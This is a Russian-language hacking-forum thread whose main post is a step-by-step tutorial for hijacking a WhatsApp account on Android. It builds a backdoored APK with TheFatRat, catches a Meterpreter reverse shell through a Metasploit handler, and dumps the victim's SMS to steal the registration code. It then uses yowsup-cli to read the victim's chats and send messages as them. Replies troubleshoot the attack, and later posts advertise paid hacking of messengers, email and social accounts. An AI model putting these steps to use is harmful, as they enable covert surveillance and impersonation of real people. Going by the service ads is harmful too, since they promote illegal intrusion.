RemoteWA Охота на пользователей Whatsapp

vertigo.png

Добрый день,Уважаемые Форумчане и Друзья.
Сегодня мы разберём с вами один из интересных способов атаки на пользователей Whatsapp.

В итоге,мы должны будем получить полный контроль над аккаунтом,просматривать сообщения,разговоры в текстовом формате.
И,на мой взгляд,самое страшное-способность отсылать сообщения от имени скомпрометированного абонента на другие контакты.

Для этого нам понадобиться знать 3 вещи: номер телефона,наличие у абонента Android и то,что он пользуется приложением Whatsapp.
Нам также будут необходимы инструменты Metasploit,TheFatRat,RemoteWA,yowsup.

Информация предназначена исключительно для ознакомления и изучения проблем безопасности.
Категорически запрещено использование упоминаемых инструментов в незаконных целях.
В случае неправомерных действий,администрация ресурса,авторы инструментов и обзора ответственности не несут.Соблюдайте разумность и этику.


Итак,погнали.У нас имеются следующие исходные данные:
а) Наш Ip-адрес роутера,он же шлюз (192.168.0.1 или 192.168.1.1)
б) Наш публичный IP-адрес (внешний)
В) MCC — код страны - это берём из википедии https://en.wikipedia.org/wiki/mobile_country_code
г) MNC — код сети (Числовой код,соотв-щий оператору сотовой сети,берём также из Вики по справочнику)
д) СС - телефонный код страны (а не то,что некоторые подумали))
В маршрутизаторе открываем для tcp-соединения порт 2020,которое будет перенаправляться на наши IP как внутренний, так и внешний.
Теперь,надо создать исполняемый файл с расширением .apk,который будет здесь/TheFatRat/output/papados.apk (к примеру)

Запускаем программу TheFatRat и выбираем 1 (создать Backdoor с msfvenom)
Далее,указываем пункт 3 (Android fatrat.apk)

IP-адрес тестируемого Amdroid, нам знать необязательно при этом.
Грузим наш файл на ресурс,позволяющий загрузить файл для свободного доступа.
Например,который приводит автор : http://ge.tt/

Это неважно,т.к. смысл в том,чтобы тестируемый абонент скачал и сохранил этот файл себе (придётся проявить способности СИ)
На данном этапе,у нас появляется доступ к мобильному устройству.

Стартуем Metasploit и закатываем use exploit / multi / handler
И указываем нагрузку : set loadload android / meterpreter / reverse_tcp

Указываем LHOST c LPORT 2020,даём команду exploit.
В этом случае,мы получаем сессию Meterpreter (если тестируемый абонент скачал себе наш вредонос)

Мы сейчас здесь не за этим конечно, и у нас уже установленa yowsup
Это библиотека python, которая позволяет нам создавать приложение, использующее службу WhatsApp.
Yowsup также используется для создания неофициального клиента WhatsApp
По идее,пакет устанавливает RemotеWA,но на всякий случай.
Уствновка:

Код:
# git clone https://github.com/tgalal/yowsup.git
# cd yowsup
# chmod +x setup.py
# sudo pip install yowsup2
# sudo python setup.py install

vertigo1.png
И установим самое главное:
Код:
# git clone https://github.com/MundoHackers/RemoteWA.git
# cd RemoteWA/
# sudo ./RemoteWA.sh
# Дважды подтверждаем (Y)
Интерфейс на первом скрине
Да,если начнёте пробовать этот инструмент,то поймёте,как автор немного перестарался,в нём есть практически всё для этой атаки.
Автоматизация всего описанного процесса,так сказать,присутствует.

водим команду:
Код:
# yowsup-cli registration --requestcode sms --phone телефон --cc телеф.код страны --mnc код фирмы,предоставляющей услуги

Этим мы добиваемся того,что whatsapp отправляет sms абоненту с кодом для входа для этого приложения.
Помним,что у нас есть открытая сессия в meterpreter, и у есть возможность просмотреть полученные sms и удалить их.

Таким образом,мы также говорим Whatsapp,что используем другое устройство (наш терминал конечно же)
На этом этапе генерируется код регистрации:
meterpreter> dump sms
Создаём файл, из которого мы можем визуализировать содержимое:
SMS messages dump

Теперь,делаем такой запрос,запустив второй терминал,и нам Whatsapp высылает пароль:
Код:
# sudo yowsup-cli registration --register код полученный  --phone телефон --cc телеф.код страны
Ищем строку pw и видим пароль.

Создадим файл с именем whatsapp_config.txt
Так становятся доступны переговоры тестируемого абонента с третьими лицами
При этом ,мы можем видеть не только слова,но и номера тех,кто говорит с тестируемым.
Код:
# sudo yowsup-cli demos --config whatsapp_config.txt --echo

А вот таким образом,мы можем от имени тестируемого отправлять сообщения,указав другой номер телефона:
Код:
# yowsup-master/sudo yowsup-cli demos --config whatsapp_config.txt --send номер телефона"сообщение"

Для себя отметил 2 сложности такого метода:
1) Файл должен попасть на Android тестируемого.
2) Тестируемый должен быть после в полном неведении (ведь ему будут приходить сообщения,которые надо будет убрать)

Но ,тем не менее,метод имеет право на существование.
Согласитесь,что если ещё и иметь физический доступ к устройству тестируемого...некрасивенько, однако , для него получается.)

На этом ,у меня всё,подробности и ответы на вопросы можно посмотреть здесь (всё же,справедливо будет дать ссылку на автора метода)
http://www.mundohackers.es/


Спасибо всем за внимание и до новых встреч.
 
вот тут бы подробней:
то есть вот есть у меня ip системы - допустим какой нибудь там 192.168...., но что значит IP листенера??? Как это узнать???

См внимательнее - листенер это порт, программа которая ожидает соеденения. Сеть обычно выглядит так:
192.168.0.1 <- роутер <----192.168.0.10 комп с пэррот или кали 192.168.0.11 жертва. Мы создаем файл, который должен нам дать доступ к 192.168.0.11 , работаем мы с 192.168.0.10, значит мы на 10 поднимаем то, что будет принимать нам связь при запуске нашего приложения на 11 машине.

Одним словом, на той системе, на которой настраивается ожидание соеденение (в метасплоит к примеру) мы и пишем этот IP в LHOST
 
  • Нравится
Реакции: id2746
См внимательнее - листенер это порт, программа которая ожидает соеденения. Сеть обычно выглядит так:
192.168.0.1 <- роутер <----192.168.0.10 комп с пэррот или кали 192.168.0.11 жертва. Мы создаем файл, который должен нам дать доступ к 192.168.0.11 , работаем мы с 192.168.0.10, значит мы на 10 поднимаем то, что будет принимать нам связь при запуске нашего приложения на 11 машине.

Одним словом, на той системе, на которой настраивается ожидание соеденение (в метасплоит к примеру) мы и пишем этот IP в LHOST
ща попробую. Отпишусь
[doublepost=1504040238,1504035734][/doublepost]Вот собственно что на выдает!!!
Снимок экрана от 2017-08-29 23-41-55.png
Снимок экрана от 2017-08-29 23-54-11.png
Снимок экрана от 2017-08-29 23-41-55.png
Снимок экрана от 2017-08-29 23-54-11.png

[doublepost=1504042634][/doublepost]вообщем я смог получить сессию meterpreter. Но дело в том, что то приложение которое ставится в андроид не протзводит соединение с сревером когда я тыкаю по нему. Сессию meterpreter я получаю когда в робычном браузере андроид вписываю те параметры которые я указал на целевой машине и метасплоите. Спустя 15 секунд после активации сессии meterpreter связь обрубается и все. команды не выполняются ))
 
Все таки, я что то неправильно делаю, или сейчас разрабочики WhatsApp что то пофиксили? Я прохожу ргистрацию через yowsup-cli, могу отправлять сообщения от абнента, но при этом у самого абонента на телефоне перестает работать клиент WhatsApp, предлагает пройти повторную регистрацию. Пройдя повторную регистрацию на телефоне, перестает работать yowsup-cli..

Аналогичная ситуация. У кого не вылетает мобильный клиент, вы регались с опцией "-Е android" или "-E s40"?

А еще у меня не грузится история после регистрации в yowsup-cli, хотя сообщения отправляются без ошибок. Может это как раз из-за того, что с телефона WhatsApp слетел? кто сталкивался?
 
Ищем строку pw и видим пароль. А как в дальнейшем нам этот пароль пригодился?
 
Помогите с вотсапом, экспорт чата. Напишите в тг.https://t.me/Dimarik6969
 
– Услуги хакеров по взлому –





Взлом почтовых ящиков (Gmail, Yahoo, Outlook и др.)


Взлом соцсетей (Facebook, Instagram, Вк, Twitter и др.)


Взлом мессенджеров (WhatsApp, Viber, Telegram и др.)


Распечатка СМС и детализация звонков


Удаление информации в Интернете и с устройств


Подбор и восстановление паролей





Гарантии


- Полная конфиденциальность


- Оперативное выполнение





Контакты


=> Почта: hackotron@gmail.com


=> Telegram: Alex





=> @Hakotron





=> Наш Telegram канал: Услуги хакеров🧑‍💻





=> @hakatron





- Работаем 24/7


- Гибкие цены и полная конфиденциальность!
 
🛠️ Профессиональные услуги хакеров 🛠️


✅ Выполняем любые поставленные задачи по взлому:


🔹 Социальные сети – ВКонтакте, Инстаграм, Одноклассники и другие.


🔹 Мессенджеры – WhatsApp, Telegram, Viber и другие.


🔹 Электронная почта – Mail, Яндекс, Gmail и другие.


🔹 Игровые аккаунты и сайты знакомств .


🔹 Удаление негативной информации из интернета.


🔹 Детализация звонков и сообщений .


🔹 Определение местоположения .





💼 Работаем круглосуточно , анонимно и конфиденциально .


⏳ Гарантируем выполнение в кратчайшие сроки.





📲 Для заказа услуг и консультаций переход на сайт: Услуги хакера от Hackingroup.ru





💻 Доверьте свою задачу профессиональным хакерам !
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab